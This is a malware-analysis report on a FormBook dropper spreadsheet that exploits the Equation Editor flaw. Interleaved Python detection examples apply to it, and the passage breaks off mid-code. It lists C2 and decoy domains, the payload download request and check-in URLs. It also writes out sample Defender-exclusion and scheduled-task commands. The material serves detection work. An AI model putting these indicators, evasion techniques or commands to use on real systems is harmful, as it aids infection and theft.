Windows Analysis Report PROFORMA INVOICE.xlsx

Overview

General Information

Sample Name: PROFORMA INVOICE.xlsx
Analysis ID: 528789
MD5: f0e46aba95165b11ad7fc84d80a73730
SHA1: 2ea511219e2c3d76597483c4998a2af40d821142
SHA256: 009dfe9d9409704671b802ddaa54ee22355f3ff41c6ef779b7e644c76466e0b0
Tags: VelvetSweatshop, xlsx

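The VelvetSweatshop tag refers to Excel's built-in default password: a workbook encrypted with the password "VelvetSweatshop" opens without any prompt, but on disk it is an OLE2/CFB container holding EncryptionInfo and EncryptedPackage streams rather than a plain OOXML zip, so scanners that only unzip the file see ciphertext. The Python below is an added example, not part of this report or of Joe Sandbox. It classifies a document by container type with a raw-byte heuristic (magic bytes plus a search for the UTF-16LE stream names, which is how CFB directory entries store them; it is not a full CFB parser) and, for a plain zip, checks the embedded OLE objects for the Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046} that marks an Equation Editor object. Both sample inputs are constructed for the demonstration.

```python
import io
import zipfile

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file header
ZIP_MAGIC = b"PK\x03\x04"                         # plain OOXML is a zip
# CFB directory entries store stream names as UTF-16LE; an encrypted OOXML file
# (including one using Excel's default password) carries these two streams.
ENCRYPTION_INFO = "EncryptionInfo".encode("utf-16-le")
ENCRYPTED_PACKAGE = "EncryptedPackage".encode("utf-16-le")
# Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046} as laid out on disk
# (Data1-Data3 little-endian, Data4 as written).
EQUATION3_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
DEFAULT_PASSWORD = "VelvetSweatshop"   # Excel's silent default password


def classify_container(data: bytes) -> str:
    """Coarse container class from magic bytes and stream names (heuristic, not a CFB parse)."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    if data.startswith(CFB_MAGIC):
        if ENCRYPTION_INFO in data and ENCRYPTED_PACKAGE in data:
            return "ooxml-encrypted"
        return "cfb-legacy"
    return "unknown"


def embeds_equation_editor(blob: bytes) -> bool:
    """True if an embedded object carries the Equation.3 CLSID or progId."""
    return EQUATION3_CLSID in blob or b"Equation.3" in blob


def triage(data: bytes) -> dict:
    """Classify the container and, for a plain OOXML zip, inspect its embedded OLE objects."""
    kind = classify_container(data)
    result = {"container": kind, "embeddings": [], "equation_editor": False}
    if kind == "ooxml-zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            result["embeddings"] = [n for n in zf.namelist() if "/embeddings/" in n]
            result["equation_editor"] = any(
                embeds_equation_editor(zf.read(n)) for n in result["embeddings"])
    elif kind == "ooxml-encrypted":
        # Static tools only see ciphertext here; decrypt first, then look inside.
        result["next_step"] = f"decrypt with {DEFAULT_PASSWORD!r}, then re-run triage"
    return result


# Constructed samples (not real files from the report).
def sample_plain_xlsx_with_equation_object() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/embeddings/oleObject1.bin", CFB_MAGIC + b"\x00" * 72 + EQUATION3_CLSID)
    return buf.getvalue()


def sample_encrypted_container() -> bytes:
    return CFB_MAGIC + b"\x00" * 56 + ENCRYPTION_INFO + b"\x00" * 40 + ENCRYPTED_PACKAGE


if __name__ == "__main__":
    for name, blob in [("plain", sample_plain_xlsx_with_equation_object()),
                       ("encrypted", sample_encrypted_container())]:
        print(name, triage(blob))
```

For a real sample the decryption step is `msoffcrypto-tool "PROFORMA INVOICE.xlsx" decrypted.xlsx -p VelvetSweatshop`; the decrypted zip is what the triage above (and oletools) should be pointed at, since the Equation Editor object only becomes visible after that step.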
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Suspicious Add Task From User AppData Temp
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Drops PE files to the user directory
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
Multi AV Scanner detection for submitted file
Source: PROFORMA INVOICE.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 9.0.vbc.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.462674322.0000000000910000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.461677984.00000000007B0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.495648156.0000000000DC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000003.495116287.00000000002A0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.495983916.00000000004E0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.661157510.0000000000BA0000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: vbc.exe, 00000009.00000002.495309971.00000000006D9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.495142826.0000000000030000.00000040.00020000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
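The process chain recorded in this section (EQNEDT32.EXE started with -Embedding, then creating C:\Users\Public\vbc.exe) is the canonical CVE-2017-11882 / CVE-2018-0802 shape, and several of the Sigma hits listed under Signatures (Droppers Exploiting CVE-2017-11882, Execution from Suspicious Folder, Powershell Defender Exclusion, the scheduled-task-from-AppData-Temp rule) all key on the same process-creation telemetry. The Python below is an added example, not part of this report and not the text of any Sigma rule: it runs those four checks over Sysmon-style process-creation events. The EQNEDT32.EXE and vbc.exe events mirror the report; the powershell and schtasks command lines are constructed stand-ins for behaviour the report names but does not quote, and the parent of EQNEDT32.EXE is left blank because the report records it as unknown.

```python
import re
from pathlib import PureWindowsPath

# User-writable drop locations (report: "Drops PE files to the user root directory").
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\windows\\temp\\")
EQNEDT = "eqnedt32.exe"   # Equation Editor has no legitimate reason to spawn children
DEFENDER_EXCLUSION = re.compile(r"add-mppreference.*-exclusion(path|process|extension)", re.I)
SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\s.*/create", re.I)
USER_TEMP = re.compile(r"\\appdata\\local\\temp\\", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> list:
    """Rule names triggered by one Sysmon EID 1 style process-creation event."""
    hits = []
    image = ev["Image"].lower()
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if parent == EQNEDT:
        hits.append("eqnedt32_spawns_process")            # Droppers Exploiting CVE-2017-11882
    if any(d in image for d in SUSPICIOUS_DIRS):
        hits.append("execution_from_suspicious_folder")   # Execution from Suspicious Folder
    if basename(image) in ("powershell.exe", "pwsh.exe") and DEFENDER_EXCLUSION.search(cmd):
        hits.append("powershell_defender_exclusion")      # Powershell Defender Exclusion
    if basename(image) == "schtasks.exe" and SCHTASKS_CREATE.search(cmd) and USER_TEMP.search(cmd):
        hits.append("scheduled_task_from_user_temp")      # Suspicious Add Task From User AppData Temp
    return hits


def evaluate(events) -> dict:
    """ProcessId -> triggered rules, for every event that triggers at least one."""
    return {ev["ProcessId"]: h for ev in events if (h := check_event(ev))}


# Constructed event stream. PIDs 2 and 3 mirror the report's process tree; 4 and 5 are
# stand-ins for the Defender-exclusion and schtasks behaviour the report names.
EVENTS = [
    {"ProcessId": 1, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "EXCEL.EXE"},
    {"ProcessId": 2, "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "ParentImage": "",   # parent not recorded in the report
     "CommandLine": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"ProcessId": 3, "Image": r"C:\Users\Public\vbc.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r"C:\Users\Public\vbc.exe"},
    {"ProcessId": 4, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\Public\vbc.exe",
     "CommandLine": r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"ProcessId": 5, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\Public\vbc.exe",
     "CommandLine": r'schtasks.exe /create /f /tn "Updater" /xml "C:\Users\user\AppData\Local\Temp\tmp1.tmp"'},
    {"ProcessId": 6, "Image": r"C:\Windows\System32\notepad.exe",   # benign control
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, rules in evaluate(EVENTS).items():
        print(pid, rules)
```

The first rule is the one that matters operationally: any child of EQNEDT32.EXE is worth an alert on its own, regardless of where it lands, because the only code that legitimately runs inside Equation Editor is Equation Editor. The folder, Defender-exclusion and schtasks rules add context and catch the same dropper when it is launched by a different initial vector.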

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.229.133:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.noyoucantridemyonewheel.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 9_2_00406ABE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop ebx 12_2_00086ABE
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 107.173.229.133:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 108.167.189.66:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.digipoint-entertainment.com
Source: C:\Windows\explorer.exe Domain query: www.hacticum.com
Source: C:\Windows\explorer.exe Network Connect: 108.167.189.66 80
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Domain query: www.trashwasher.com
Source: C:\Windows\explorer.exe Domain query: www.noyoucantridemyonewheel.com
Source: C:\Windows\explorer.exe Domain query: www.franquiciasexclusivas.tienda
Source: C:\Windows\explorer.exe Network Connect: 151.106.119.46 80
Source: C:\Windows\explorer.exe Domain query: www.deboraverdian.com
Source: C:\Windows\explorer.exe Network Connect: 151.101.66.159 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.septemberstockevent200.com/ht08/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 | Host: www.noyoucantridemyonewheel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 | Host: www.deboraverdian.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 | Host: www.franquiciasexclusivas.tienda | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 | Host: www.hacticum.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 | Host: www.trashwasher.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 25 Nov 2021 18:26:21 GMT | Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25 | Last-Modified: Thu, 25 Nov 2021 07:58:32 GMT | ETag: "6c800-5d19857437223" | Accept-Ranges: bytes | Content-Length: 444416 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 42 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 be 06 00 00 08 00 00 00 00 00 00 36 dc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 db 06 00 4f 00 00 00 00 e0 06 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c bc 06 00 00 20 00 00 00 be 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 e0 06 00 00 06 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 07 00 00 02 00 00 00 c6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 dc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 14 76 00 00 03 00 00 00 93 00 00 06 bc 
db 00 00 28 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /90009/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 107.173.229.133 | Connection: Keep-Alive
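Two distinct network patterns appear in this section. The first is the stage-one download: vbc.exe fetched by bare IP (no DNS query precedes the connection), with a hard-coded MSIE 7 User-Agent, answered with Content-Type application/x-msdownload and a body that starts with MZ; the header bytes in that dump (machine 4c 01, three sections named .text/.rsrc/.reloc, and a CLI header beginning 48 00 00 00 02 00 05 00) mark it as a 32-bit .NET image, which matches the ".NET source code contains potential unpacker" signature. The second is the FormBook check-in: a GET to /ht08/ carrying one long base64-like parameter and one short fixed one, no User-Agent, Connection: close and a 7-byte null body, sent to hosts that are all in the decoy list of the extracted configuration; the configured C2 www.septemberstockevent200.com is not contacted in this run. The Python below is an added example, not from this report or from Joe Sandbox: one small header parser serves three checks (executable download, FormBook-style beacon, decoy-versus-C2 classification). The request and response headers are copied from the report; the MZ/PE stub body and the decoy subset are constructed.

```python
import re
import struct
from urllib.parse import urlsplit


def parse_http(raw: bytes) -> dict:
    """Split one HTTP/1.1 message into start line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def is_pe_body(body: bytes) -> bool:
    """MZ header plus a PE\\0\\0 signature at e_lfanew (offset 0x3C)."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    return body[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def flag_download(request: dict, response: dict) -> list:
    """Indicators of a first-stage payload fetch, in the order they are checked."""
    hits = []
    _, target, _ = request["start"].split(" ", 2)
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", request["headers"].get("host", "")):
        hits.append("bare_ip_host")            # no DNS query precedes the connection
    if urlsplit(target).path.lower().endswith((".exe", ".dll", ".scr")):
        hits.append("executable_extension")
    if (response["headers"].get("content-type", "").startswith("application/x-msdownload")
            or is_pe_body(response["body"])):
        hits.append("pe_payload")
    if "MSIE 7.0" in request["headers"].get("user-agent", ""):
        hits.append("legacy_msie_ua")          # hard-coded Win7-era browser string
    return hits


FORMBOOK_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # e.g. /ht08/
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def is_formbook_checkin(request: dict) -> bool:
    """GET /<short>/?<k>=<long base64>&<k>=<short>, no User-Agent, Connection: close."""
    method, target, _ = request["start"].split(" ", 2)
    parts = urlsplit(target)
    # Split by hand: parse_qsl would turn the '+' inside the base64 blob into a space.
    values = [kv.partition("=")[2] for kv in parts.query.split("&") if kv]
    if method != "GET" or not FORMBOOK_PATH.match(parts.path) or len(values) != 2:
        return False
    return (any(B64_BLOB.fullmatch(v) for v in values)
            and "user-agent" not in request["headers"]
            and request["headers"].get("connection", "").lower() == "close")


def classify_hosts(config: dict, observed) -> dict:
    """Label each contacted host as the configured C2, a configured decoy, or unlisted."""
    c2 = {u.split("/")[0].lower().removeprefix("www.") for u in config["C2 list"]}
    decoys = {d.lower().removeprefix("www.") for d in config["decoy"]}
    out = {}
    for host in observed:
        bare = host.lower().removeprefix("www.")
        out[host] = "c2" if bare in c2 else "decoy" if bare in decoys else "unlisted"
    return out


# Headers copied from the report; the response body is a constructed MZ/PE stub
# standing in for the 444416-byte vbc.exe.
DOWNLOAD_REQUEST = (
    b"GET /90009/vbc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
    b".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\n"
    b"Host: 107.173.229.133\r\nConnection: Keep-Alive\r\n\r\n")
PE_STUB = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 4
DOWNLOAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25\r\n"
    b"Content-Length: 444416\r\nContent-Type: application/x-msdownload\r\n\r\n") + PE_STUB
CHECKIN_REQUEST = (
    b"GET /ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ=="
    b"&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1\r\nHost: www.deboraverdian.com\r\nConnection: close\r\n\r\n"
    + b"\x00" * 7)
# Subset of the FormBook configuration extracted above.
CONFIG = {"C2 list": ["www.septemberstockevent200.com/ht08/"],
          "decoy": ["deboraverdian.com", "noyoucantridemyonewheel.com", "hacticum.com",
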